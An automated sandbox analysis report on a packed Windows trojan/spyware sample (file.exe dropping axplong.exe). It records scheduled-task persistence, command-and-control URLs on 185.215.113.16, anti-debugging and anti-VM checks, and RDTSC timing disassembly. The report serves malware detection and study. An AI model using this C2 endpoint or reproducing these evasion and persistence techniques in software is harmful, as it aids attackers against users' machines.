                    Source: axplong.exe, 00000006.00000002.2996262320.00000000015FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncodedh
                    Source: axplong.exe, 00000006.00000002.2996262320.0000000001617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpq
                    Source: axplong.exe, 00000006.00000002.2996262320.0000000001617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpw
                    Source: axplong.exe, 00000006.00000002.2996262320.00000000015FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpzRm4SJjISZA3JNjZ64n0LR=

                    System Summary

                    barindex
                    Source: file.exeStatic PE information: section name:
                    Source: file.exeStatic PE information: section name: .idata
                    Source: file.exeStatic PE information: section name:
                    Source: axplong.exe.0.drStatic PE information: section name:
                    Source: axplong.exe.0.drStatic PE information: section name: .idata
                    Source: axplong.exe.0.drStatic PE information: section name:
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\axplong.jobJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00F84CF06_2_00F84CF0
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00FC30686_2_00FC3068
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00F8E4406_2_00F8E440
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00FB7D836_2_00FB7D83
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00F84AF06_2_00F84AF0
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00FC765B6_2_00FC765B
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00FC2BD06_2_00FC2BD0
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00FC777B6_2_00FC777B
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00FC87206_2_00FC8720
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00FC6F096_2_00FC6F09
                    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: file.exeStatic PE information: Section: ZLIB complexity 0.997264560626703
                    Source: file.exeStatic PE information: Section: ttawmtnf ZLIB complexity 0.9947279324870387
                    Source: axplong.exe.0.drStatic PE information: Section: ZLIB complexity 0.997264560626703
                    Source: axplong.exe.0.drStatic PE information: Section: ttawmtnf ZLIB complexity 0.9947279324870387
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/3@0/1
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeMutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\44111dbc49Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: file.exeReversingLabs: Detection: 55%
                    Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: axplong.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: axplong.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: axplong.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: mstask.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: dui70.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: duser.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: chartv.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: oleacc.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: atlthunk.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: explorerframe.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
                    Source: file.exeStatic file information: File size 1882624 > 1048576
                    Source: file.exeStatic PE information: Raw size of ttawmtnf is bigger than: 0x100000 < 0x199e00

                    Data Obfuscation

                    barindex
                    Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.eb0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ttawmtnf:EW;ozsesycy:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ttawmtnf:EW;ozsesycy:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeUnpacked PE file: 1.2.axplong.exe.f80000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ttawmtnf:EW;ozsesycy:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ttawmtnf:EW;ozsesycy:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeUnpacked PE file: 2.2.axplong.exe.f80000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ttawmtnf:EW;ozsesycy:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ttawmtnf:EW;ozsesycy:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeUnpacked PE file: 6.2.axplong.exe.f80000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ttawmtnf:EW;ozsesycy:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ttawmtnf:EW;ozsesycy:EW;.taggant:EW;
                    Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                    Source: axplong.exe.0.drStatic PE information: real checksum: 0x1d8b66 should be: 0x1ccd5c
                    Source: file.exeStatic PE information: real checksum: 0x1d8b66 should be: 0x1ccd5c
                    Source: file.exeStatic PE information: section name:
                    Source: file.exeStatic PE information: section name: .idata
                    Source: file.exeStatic PE information: section name:
                    Source: file.exeStatic PE information: section name: ttawmtnf
                    Source: file.exeStatic PE information: section name: ozsesycy
                    Source: file.exeStatic PE information: section name: .taggant
                    Source: axplong.exe.0.drStatic PE information: section name:
                    Source: axplong.exe.0.drStatic PE information: section name: .idata
                    Source: axplong.exe.0.drStatic PE information: section name:
                    Source: axplong.exe.0.drStatic PE information: section name: ttawmtnf
                    Source: axplong.exe.0.drStatic PE information: section name: ozsesycy
                    Source: axplong.exe.0.drStatic PE information: section name: .taggant
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00F9D84C push ecx; ret 6_2_00F9D85F
                    Source: file.exeStatic PE information: section name: entropy: 7.981060987625007
                    Source: file.exeStatic PE information: section name: ttawmtnf entropy: 7.953226597042887
                    Source: axplong.exe.0.drStatic PE information: section name: entropy: 7.981060987625007
                    Source: axplong.exe.0.drStatic PE information: section name: ttawmtnf entropy: 7.953226597042887
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeJump to dropped file

                    Boot Survival

                    barindex
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonclassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonclassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonclassJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\axplong.jobJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1F1D7 second address: F1F1DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1F1DB second address: F1F1E4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1F1E4 second address: F1F1EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1F1EA second address: F1EAD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 mov dword ptr [ebp+122D238Ch], edx 0x0000000d push dword ptr [ebp+122D170Dh] 0x00000013 sub dword ptr [ebp+122D21EDh], eax 0x00000019 call dword ptr [ebp+122D1FE7h] 0x0000001f pushad 0x00000020 pushad 0x00000021 mov edx, 51D09851h 0x00000026 jmp 00007F9D106F7665h 0x0000002b popad 0x0000002c xor eax, eax 0x0000002e jmp 00007F9D106F765Ch 0x00000033 jmp 00007F9D106F7662h 0x00000038 mov edx, dword ptr [esp+28h] 0x0000003c mov dword ptr [ebp+122D20ABh], edi 0x00000042 mov dword ptr [ebp+122D2AA8h], eax 0x00000048 jmp 00007F9D106F7660h 0x0000004d cld 0x0000004e mov esi, 0000003Ch 0x00000053 sub dword ptr [ebp+122D23C2h], edi 0x00000059 add esi, dword ptr [esp+24h] 0x0000005d mov dword ptr [ebp+122D20ABh], edi 0x00000063 lodsw 0x00000065 stc 0x00000066 add eax, dword ptr [esp+24h] 0x0000006a pushad 0x0000006b push edi 0x0000006c mov edi, dword ptr [ebp+122D29E8h] 0x00000072 pop ebx 0x00000073 stc 0x00000074 popad 0x00000075 mov ebx, dword ptr [esp+24h] 0x00000079 jno 00007F9D106F765Ch 0x0000007f nop 0x00000080 jmp 00007F9D106F765Dh 0x00000085 push eax 0x00000086 push ebx 0x00000087 push eax 0x00000088 push edx 0x00000089 jmp 00007F9D106F7662h 0x0000008e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10906F6 second address: 1090716 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F9D1073AE76h 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1090716 second address: 1090729 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D106F765Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1090729 second address: 109072E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109072E second address: 1090746 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F9D106F7656h 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jl 00007F9D106F7656h 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1090746 second address: 1090752 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1090B95 second address: 1090BA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a pop esi 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1090BA0 second address: 1090BA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1090FA0 second address: 1090FA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1090FA6 second address: 1090FAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1090FAA second address: 1090FB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1093D15 second address: F1EAD7 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F9D1073AE6Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 1C058D35h 0x00000011 mov dword ptr [ebp+122D21D7h], ebx 0x00000017 push dword ptr [ebp+122D170Dh] 0x0000001d mov di, ax 0x00000020 call dword ptr [ebp+122D1FE7h] 0x00000026 pushad 0x00000027 pushad 0x00000028 mov edx, 51D09851h 0x0000002d jmp 00007F9D1073AE75h 0x00000032 popad 0x00000033 xor eax, eax 0x00000035 jmp 00007F9D1073AE6Ch 0x0000003a jmp 00007F9D1073AE72h 0x0000003f mov edx, dword ptr [esp+28h] 0x00000043 mov dword ptr [ebp+122D20ABh], edi 0x00000049 mov dword ptr [ebp+122D2AA8h], eax 0x0000004f jmp 00007F9D1073AE70h 0x00000054 cld 0x00000055 mov esi, 0000003Ch 0x0000005a sub dword ptr [ebp+122D23C2h], edi 0x00000060 add esi, dword ptr [esp+24h] 0x00000064 mov dword ptr [ebp+122D20ABh], edi 0x0000006a lodsw 0x0000006c stc 0x0000006d add eax, dword ptr [esp+24h] 0x00000071 pushad 0x00000072 push edi 0x00000073 mov edi, dword ptr [ebp+122D29E8h] 0x00000079 pop ebx 0x0000007a stc 0x0000007b popad 0x0000007c mov ebx, dword ptr [esp+24h] 0x00000080 jno 00007F9D1073AE6Ch 0x00000086 nop 0x00000087 jmp 00007F9D1073AE6Dh 0x0000008c push eax 0x0000008d push ebx 0x0000008e push eax 0x0000008f push edx 0x00000090 jmp 00007F9D1073AE72h 0x00000095 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1093F80 second address: 1093F8B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F9D106F7656h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1094040 second address: 1094045 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1094045 second address: 109404B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109404B second address: 109405B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109405B second address: 10940F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D106F765Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a mov eax, dword ptr [eax] 0x0000000c jmp 00007F9D106F7665h 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 jmp 00007F9D106F7668h 0x0000001a pop eax 0x0000001b sub edx, dword ptr [ebp+122D2447h] 0x00000021 mov si, 8480h 0x00000025 push 00000003h 0x00000027 jmp 00007F9D106F765Bh 0x0000002c push 00000000h 0x0000002e push 00000003h 0x00000030 push 00000000h 0x00000032 push edi 0x00000033 call 00007F9D106F7658h 0x00000038 pop edi 0x00000039 mov dword ptr [esp+04h], edi 0x0000003d add dword ptr [esp+04h], 00000015h 0x00000045 inc edi 0x00000046 push edi 0x00000047 ret 0x00000048 pop edi 0x00000049 ret 0x0000004a xor dword ptr [ebp+122D23C2h], esi 0x00000050 push DC6B0E2Eh 0x00000055 push eax 0x00000056 push edx 0x00000057 pushad 0x00000058 jg 00007F9D106F7656h 0x0000005e jp 00007F9D106F7656h 0x00000064 popad 0x00000065 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B38D4 second address: 10B38D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B18E2 second address: 10B18EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B22F5 second address: 10B230D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9D1073AE74h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B230D second address: 10B2333 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F9D106F7667h 0x0000000c je 00007F9D106F7656h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B274A second address: 10B2751 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B2751 second address: 10B2778 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F9D106F765Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F9D106F7665h 0x00000011 rdtsc
